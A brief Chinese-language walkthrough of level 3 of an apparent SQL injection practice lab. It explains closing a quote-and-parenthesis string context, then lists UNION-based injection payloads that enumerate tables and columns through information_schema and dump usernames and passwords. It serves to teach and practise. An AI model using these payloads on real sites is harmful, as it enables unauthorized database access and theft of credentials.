1.首先我们打开第三关看一下
2.这个和之前1.2关提示都是一样,所以我们先输入id数字看一下显示什么
3.这里正常回显,当我们后边加上'时可以看到页面报错信息。可推断sql语句是单引号字符型且有括号,所以我们需要闭合单引号且也要考虑括号。
4.当我们知道报错信息后,就可以针对报错信息进行注入
?id=1')--+
5.这样我们就将括号和单引号给绕过,成功绕过之后我们就能正常操作了
- ?id=2')--+
- ?id=1') order by 3--+
- ?id=-1') union select 1,2,3--+
- ?id=-1') union select 1,database(),version()--+
- ?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
- ?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
- ?id=-1') union select 1,2,group_concat(username ,id , password) from users--+
6.后边的操作就是和之前两关的操作一样
